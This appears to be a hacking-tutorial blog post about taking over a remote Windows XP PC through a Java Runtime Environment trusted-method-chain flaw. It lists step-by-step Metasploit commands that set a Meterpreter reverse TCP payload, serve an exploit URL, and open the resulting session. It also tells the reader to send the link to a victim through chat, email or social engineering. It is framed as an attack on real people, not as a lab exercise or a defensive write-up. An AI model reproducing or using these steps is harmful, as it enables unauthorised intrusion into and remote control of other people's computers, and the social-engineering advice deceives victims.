Hack Remote PC with java Trusted Chain Method

Java Statement.invoke() Trusted Method Chain Privilege Escalation

This module exploits vulnerability in Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Java 6 Standard Edition prior to update 20

Java 6 Standard Edition Update 18

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_trusted_chain

Msf exploit (java_trusted_chain)>set payload java/meterpreter/reverse_tcp

Msf exploit (java_trusted_chain)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (java_trusted_chain)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (java_trusted_chain)>set uripath javatrustedchain (The Url to use for this exploit)

Msf exploit (java_trusted_chain)>exploit

Now an URL you should give to your victim //192.168.1.4:8080/javatrustedchain

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *